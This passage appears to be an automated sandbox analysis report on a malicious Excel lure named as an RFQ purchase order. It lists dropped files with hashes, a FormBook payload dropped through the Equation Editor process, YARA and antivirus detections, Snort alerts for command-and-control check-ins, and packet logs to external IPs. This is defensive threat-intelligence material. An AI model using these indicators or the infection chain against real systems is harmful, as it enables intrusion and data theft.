                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                            Category:dropped
                                            Size (bytes):11303
                                            Entropy (8bit):7.909402464702408
                                            Encrypted:false
                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                            Malicious:false
                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\215471E8.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):10202
                                            Entropy (8bit):7.870143202588524
                                            Encrypted:false
                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                            Malicious:false
                                            Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\765438C9.jpeg
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                            Category:dropped
                                            Size (bytes):4396
                                            Entropy (8bit):7.884233298494423
                                            Encrypted:false
                                            SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                            MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                            SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                            SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                            SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                            Malicious:false
                                            Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89430EC3.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                            Category:dropped
                                            Size (bytes):11303
                                            Entropy (8bit):7.909402464702408
                                            Encrypted:false
                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                            Malicious:false
                                            Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCAAC72D.emf
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                            Category:dropped
                                            Size (bytes):1628828
                                            Entropy (8bit):2.2291385285074514
                                            Encrypted:false
                                            SSDEEP:3072:YVMqDjXlNqlVkXFL4we9ANp7RySvRaXGcmfBEtAPrcccccsF8WccccccccF9cccC:YLjXlN0k1fKANpFZIiByA764
                                            MD5:731E0B08FA0E7DC5F3D10B43E2E3B5F7
                                            SHA1:5F7908B924DD863D52A9DBCB275616AA64BFD1BA
                                            SHA-256:8B1146C31A794D99510D3EC88648FA508C6E6274E62E3862A8DB7A1BFC2C111F
                                            SHA-512:CE36183E1CEB8EADDBAC1922FFADA487B9A08CF184CB07F0B83AB23DB137A120C1125A3F0583E12370C4B35525FE618FE756A50FBA16B0C167C7FF490FCD1E2E
                                            Malicious:false
                                            Preview: ....l...........................m>...&.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................Iy$...H....fSy.@..%...$...h...........L...RQ.V............4.......$Q.V........ ...IdSy........ ............dSy........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........X...X............8Ky........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD131EBF.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):10202
                                            Entropy (8bit):7.870143202588524
                                            Encrypted:false
                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                            Malicious:false
                                            Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                            C:\Users\user\AppData\Local\Temp\Cielert.tmp
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):167424
                                            Entropy (8bit):7.221469399680655
                                            Encrypted:false
                                            SSDEEP:3072:qJgt2lV8dYbBsWMIQayA8k/Mu74upkpOK4xj/wFIOnK6tap:VyrfMIVHd/Mg40kpOK4xj/wh
                                            MD5:295FBD9F8E4A4888B8FFECE30A34C962
                                            SHA1:37884E14B9075E00A40B071A64004670525C6676
                                            SHA-256:8916FF8C659E74F4A3523CDA054E5ED98209F84CB23F28C5857D670D5DC512E2
                                            SHA-512:AA2AEB7984FEF6642062A07D9981B88756DBA48F8116004B71EE65E920EA33C1A38230541ADD293CBC5E5A94B57157C1FE767E7F0924D1F4E46404AB78BBBE90
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 50%, Browse
                                            • Antivirus: ReversingLabs, Detection: 89%
                                            Preview: MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.......}f?.9.QH9.QH9.QH"..Hu.QH"..H:.QH"..H8.QHRich9.QH........PE..L...J.'F.................|........................@.......................................@..........................................................................................................................................................text....z.......|.................. ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\~DF07CC82DF0855DA38.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\~DF2396DECF927A66A1.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\~DF90CE48132EA3580B.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:CDFV2 Encrypted
                                            Category:dropped
                                            Size (bytes):304184
                                            Entropy (8bit):7.976608927486528
                                            Encrypted:false
                                            SSDEEP:6144:VIBQ3UNUjY9p3U3jjEl4vzTJpxdaO53SXUjS2LIGI9DGv:VIB92eU3PElChxy2ZCw
                                            MD5:552F043A7C752EC7E8DDDBDF0B36C4D8
                                            SHA1:CFB4A5BEA12CAB9A47D3FF1EE1210D444B9A92A4
                                            SHA-256:E7A5F1C37A043773027F4937AFB63D3178362113132066C7435B6D716EDA6CF2
                                            SHA-512:2D5C9C4DC2F5A483CD572DB62F5339446391CD152F86F227F0C044D620C010B9433C1F6AA59133F799BD16F433AD9BC7035062384EA00A50F72D29BA74FC8273
                                            Malicious:false
                                            Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                            C:\Users\user\AppData\Local\Temp\~DFCD6368038830CEF2.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\Desktop\~$RFQ_Order_PO_TAE5203E.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            C:\Users\Public\vbc.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):598016
                                            Entropy (8bit):7.276412737461471
                                            Encrypted:false
                                            SSDEEP:12288:KrsJGHL/Sw61UEVluVwMh8YelnvoCUiNG5VNQa5VQeiXMr0cZhMsr:CsJGHLbEVlu3elnwCR8xVPiXURr
                                            MD5:A21C93294EF3770C5C728A1B2D82FB92
                                            SHA1:239E6B8D02BA3501EFDC22AE5690DCE827F3AA6B
                                            SHA-256:1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
                                            SHA-512:5621C1D39B752D5320CEE7BD265AB0C26C14791215F2A3D9F34BD870DC818DEB36DD0F46B443F95919B41544FC13C671F2C50B4C6602B15642DBF4C655C54748
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                            • Antivirus: ReversingLabs, Detection: 60%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................................N.....%..F..%.....u.....Rich...................PE..L...t.FX.....................0......5Z............@..........................p...............................................A......................................5................................................................................text...m........................... ..`.rdata..nl.......p..................@..@.data.......`...`...`..............@....bss................................@..@.bdata..............................@...................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:CDFV2 Encrypted
                                            Entropy (8bit):7.976608927486528
                                            TrID:
                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                            File name:RFQ_Order_PO_TAE5203E.xlsx
                                            File size:304184
                                            MD5:552f043a7c752ec7e8dddbdf0b36c4d8
                                            SHA1:cfb4a5bea12cab9a47d3ff1ee1210d444b9a92a4
                                            SHA256:e7a5f1c37a043773027f4937afb63d3178362113132066c7435b6d716eda6cf2
                                            SHA512:2d5c9c4dc2f5a483cd572db62f5339446391cd152f86f227f0c044d620c010b9433c1f6aa59133f799bd16f433ad9bc7035062384ea00a50f72d29ba74fc8273
                                            SSDEEP:6144:VIBQ3UNUjY9p3U3jjEl4vzTJpxdaO53SXUjS2LIGI9DGv:VIB92eU3PElChxy2ZCw
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/13/22-20:10:41.317248TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22163.197.71.43
                                            01/13/22-20:10:41.317248TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22163.197.71.43
                                            01/13/22-20:10:41.317248TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22163.197.71.43

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2022 20:09:01.283556938 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.454504013 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.454636097 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.454904079 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.625545979 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.625571012 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.625587940 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.625606060 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.625705957 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.625756025 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795497894 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795569897 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795583010 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795624971 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795635939 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795685053 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795700073 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795747042 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795757055 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795810938 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795826912 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795878887 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795890093 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.795937061 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.795953989 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.796000957 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966166973 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966222048 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966260910 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966300964 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966341019 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966366053 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966377974 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966404915 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966409922 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966430902 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966451883 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966475964 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966501951 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966516972 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966538906 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966559887 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966587067 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966599941 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966624975 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966639042 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966660976 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966679096 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966718912 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966731071 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966759920 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966773987 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966801882 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:01.966824055 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.966862917 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:01.971823931 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136657953 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136702061 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136724949 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136749029 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136770010 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136795044 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136821032 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136843920 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136866093 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136883974 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136888981 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136914015 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136919022 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136925936 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136929989 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136933088 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136940002 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136951923 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136966944 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136972904 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.136993885 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.136998892 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137020111 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137026072 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137044907 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137053967 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137072086 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137080908 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137099981 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137104988 CET4916780192.168.2.22209.141.37.110
                                            Jan 13, 2022 20:09:02.137128115 CET8049167209.141.37.110192.168.2.22
                                            Jan 13, 2022 20:09:02.137131929 CET4916780192.168.2.22209.141.37.110
